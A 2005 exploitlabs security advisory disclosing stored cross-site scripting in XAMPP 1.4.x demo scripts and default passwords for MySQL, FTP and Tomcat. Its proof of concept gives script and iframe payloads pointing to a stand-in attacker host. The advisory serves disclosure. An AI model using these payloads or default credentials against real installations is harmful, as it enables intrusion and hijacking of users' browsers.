------------------------------------------------------------
      - EXPL-A-2005-006 exploitlabs.com Advisory 035 -
------------------------------------------------------------
                         - XAMPP -



OVERVIEW
========
XAMPP is an easy to install Apache distribution containing MySQL,
PHP and Perl. XAMPP is really very easy to install and to use
 - just download, extract and start

http://www.apachefriends.org/en/xampp.html




AFFECTED PRODUCTS
=================
Windows Version 1.4.X
http://www.apachefriends.org/en/xampp-windows.html

Linux 1.4.X ( all ) 
http://www.apachefriends.org/en/xampp-linux.html

Solaris 0.3 ( all )
http://www.apachefriends.org/en/xampp-solaris.html




DETAILS
=======
1.
persistant XSS is present in user supplied input fields
allowing attackers to render any javascript in the users browser.
some javascript will break the application, disallowing further
user input to the script.

http://[host]/xampp/cds.php
http://[host]/xampp/guestbook-en.pl ( linux )
http://[host]/xampp/phonebook.php




2.
defalt / install usernames and passwords

by viewing http://[host]/xampp/security.php XAMPP discloses
usernames / passwords ( example below )


Item 2a
-------
The phpMyAdmin user pma has no password  UNSECURE    
 phpMyAdmin saves your preferences in an extra MySQL database. To access this data
 phpMyAdmin uses the special user pma. This user has in the default installation no
 password set and to avoid any security problems you should give him a passwort.
 

Item 2b
-------
The MySQL user root has no password  UNSECURE    
 Every local user on Linux box can access your MySQL database with administrator rights.
 You should set a password.
 

Item 2c
-------
The FTP password for user nobody is still 'lampp'  UNSECURE    
 By using the default password for the FTP user nobody everyone can upload and change
 files for your XAMPP webserver. So if you enabled ProFTPD you should set a new password
 for user nobody.
 

Item 2d
-------
Tomcat Admin/Config User for XAMPP: 
User: xampp 
Password: xampp 



PROOF OF CONCEPT
================

Item 1a
-------
http://[host]/xampp/cds.php
enter text...
<script language=JavaScript src=http://evilattacker/js.js></script>

stores values in the mysql database

also 1c

Item 1b
-------
http://[host]/xampp/guestbook-en.pl
see 1(c)


Item 1c
-------
http://[host]/xampp/phonebook.php
enter into a input field...

<iframe src=http://evilatacker></iframe>

and when rendered forceably redirects the user to http;//evilattacker



SOLUTION
========
none ( see vendor response )

vendor response:
----------------

Dear Donnie!

> you have a severly insecure package.
> here are my raw notes.

Thank you for your notes. But XAMPP is meant only for internal
development usage and not on production systems. 

See http://www.apachefriends.org/en/xampp.html 
(section "The philosopy")

The vulnerable scripts are only very simple demonstation programms to
test the functions of Apache/MySQL/etc. and to give beginners first
inspirations in programming. 
Also this scripts are not meant for public usage.

But you may be right. We should make the warning messages about the
dangers of use for our software bigger.


researcher comment:
-------------------

a disclaimer of this type does not mitigate the security issues
present in XAMPP. this package is targeted at beginners, the very
users who need to be protected the most and taught secure by default.





CREDITS
=======
This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs

Donnie Werner
Information Security Specialist
security@exploitlabs.com

-- 
web:	http://exploitlabs.com